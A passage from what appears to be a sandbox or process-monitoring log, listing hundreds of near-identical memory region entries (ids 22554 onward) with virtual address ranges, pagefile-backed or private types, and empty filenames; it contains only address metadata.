"pagefile_0x0000000000570000" filename = "" Region: id = 22554 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22555 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22556 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22557 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22558 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22559 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22560 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22561 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22562 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22563 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22564 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22565 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22566 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22567 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22568 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22569 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22570 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22571 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22572 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22573 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22574 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22575 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22576 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22577 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22578 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22579 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22580 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22581 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22582 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22583 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22584 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22585 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22586 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22587 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22588 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22589 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22590 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22591 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22592 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22593 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22594 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22595 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22596 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22597 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22598 start_va = 0x570000 end_va = 0x57dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22599 start_va = 0x2100000 end_va = 0x2106fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 22600 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22601 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22602 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22603 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22604 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22605 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22606 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22607 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22608 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22609 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22610 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22611 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22612 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22613 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22614 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22615 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22616 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22617 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22618 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22619 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22620 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22621 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22622 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22623 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22624 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22625 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22626 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22627 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22628 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22629 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22630 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22631 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22632 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22633 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22634 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22635 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22636 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22637 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22638 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22639 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22640 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22641 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22642 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22643 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22644 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22645 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22646 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22647 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22648 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22649 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22650 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22651 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22652 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22653 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22654 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22655 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22656 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22657 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22658 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22659 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22660 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22661 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22662 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22663 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22664 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22665 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22666 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22667 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22668 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22669 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22670 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22671 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22672 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22673 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22674 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22675 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22676 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22677 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22678 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22679 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22680 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22681 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22682 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22683 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22684 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22685 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22686 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22687 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22688 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22689 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22690 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22691 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22692 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22693 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22694 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22695 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22696 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22697 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22698 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22699 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22700 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22701 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22702 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22703 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22704 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22705 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22706 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22707 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22708 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22709 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22710 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22711 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22712 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22713 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22714 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22715 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22716 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22717 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22718 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22719 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22720 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22721 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22722 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22723 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22724 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22725 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22726 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22727 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22728 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22729 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22730 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22731 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22732 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22733 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22734 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22735 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22736 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22737 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22738 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22739 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22740 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22741 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 22742 start_va = 0x26d0000 end_va = 0x26defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 22743 start_va = 0x26d0000 end_va = 0x26dffff 